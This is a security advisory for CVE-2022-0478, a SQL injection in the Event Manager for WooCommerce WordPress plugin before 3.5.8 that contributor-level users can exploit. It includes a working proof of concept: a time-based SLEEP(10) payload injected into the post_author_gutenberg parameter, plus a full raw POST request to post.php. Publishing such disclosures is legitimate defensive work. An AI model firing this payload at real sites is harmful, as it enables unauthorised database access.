Event Manager for WooCommerce < 3.5.8 – Contributor+ SQL Injection | CVE 2022-0478

Description

The plugin does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks

Proof of Concept

Create or edit an event as a contributor, intercept the request and append the following payload to the post_author_gutenberg POST parameter: /**/WHERE/**/ID=VALID_POST_EVENT_ID/**/AND/**/SLEEP(10)/**/--

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1742
Connection: close
Cookie: [contributor+]
Upgrade-Insecure-Requests: 1

_wpnonce=89e8e9bf38&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=mep_events&original_post_status=pending&post_ID=5724&meta-box-order-nonce=b0848a8368&closedpostboxesnonce=d77823a21d&original_post_title=Contrib+SQLi&post_title=Contrib+SQLi&samplepermalinknonce=3929b239b6&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bmep_cat%5D%5B%5D=0&tax_input%5Bmep_org%5D%5B%5D=0&mep_event_template=default-theme.php&mep_fw_nonce=bd4f075693&mep_list_thumbnail=&post_author_gutenberg=5/**/WHERE/**/ID=5724/**/AND/**/SLEEP(10)/**/--&mep_org_address=0&mep_location_venue=&mep_street=&mep_city=&mep_state=&mep_postcode=&mep_country=&mep_event_ticket_type_nonce=3a65192659&option_name_t%5B%5D=&option_price_t%5B%5D=&option_qty_t%5B%5D=&option_default_qty_t%5B%5D=&option_rsv_t%5B%5D=&option_sale_end_date%5B%5D=&option_sale_end_time%5B%5D=&option_qty_t_type%5B%5D=&mep_events_extra_price_nonce=14d31c6699&option_name%5B%5D=&option_price%5B%5D=&option_qty%5B%5D=&option_qty_type%5B%5D=&event_start_date=&event_start_time=&event_end_date=&event_end_time=00%3A00&event_more_start_date%5B%5D=&event_more_start_time%5B%5D=&event_more_end_date%5B%5D=&event_more_end_time%5B%5D=&mep_event_ricn_text_nonce=8e31f2b499&mep_rich_text_status=enable&mep_rt_event_status=EventRescheduled&mep_rt_event_attandence_mode=OfflineEventAttendanceMode&mep_rt_event_prvdate=2022-02-02+13%3A25%3A04&mep_event_reg_btn_nonce=c702a3ef44&mep_event_sku=&mep_reg_status=on&mep_show_end_datetime=yes&mep_event_reg_btn_nonce=c702a3ef44&mep_available_seat=on&mep_event_reset_btn_nonce=11ce7e0cfd&mp_event_virtual_type_des=&mep_member_only_user_role%5B%5D=all&mep_fw_nonce=bd4f075693&mep_event_cc_email_text=&excerpt=